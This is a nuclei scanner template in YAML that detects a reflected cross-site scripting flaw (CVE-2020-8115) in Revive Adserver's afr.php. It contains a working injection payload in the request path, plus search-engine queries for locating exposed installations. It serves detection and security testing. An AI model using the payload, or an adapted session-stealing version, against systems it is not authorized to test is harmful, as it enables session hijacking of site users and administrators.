nuclei-templates/http/cves/2020/CVE-2020-8115.yaml

54 lines
2.3 KiB
YAML

id: CVE-2020-8115
info:
name: Revive Adserver <=5.0.3 - Cross-Site Scripting
author: madrobot,dwisiswant0
severity: medium
description: |
Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
reference:
- https://hackerone.com/reports/775693
- https://www.revive-adserver.com/security/revive-sa-2020-001/
- https://nvd.nist.gov/vuln/detail/CVE-2020-8115
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/merlinepedra/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-8115
cwe-id: CWE-79
epss-score: 0.0187
epss-percentile: 0.88393
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: revive-adserver
product: revive_adserver
shodan-query:
- http.title:"revive adserver"
- http.favicon.hash:106844876
fofa-query:
- icon_hash=106844876
- title="revive adserver"
google-query: intitle:"revive adserver"
tags: cve,cve2020,xss,hackerone,revive-adserver
http:
- method: GET
path:
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- (?mi)window\.location\.replace\(".*alert\(1337\)
- type: status
status:
- 200
# digest: 4a0a00473045022100fa784325a075212b3ce0376865f96c93c378ab99f4faeab9555776ec9f016c8f02200d54da34c1a8855ddf5491aee9b943191c45503351855984c257397f86a7b24f:922c64590222798bb761d5b6d8e72950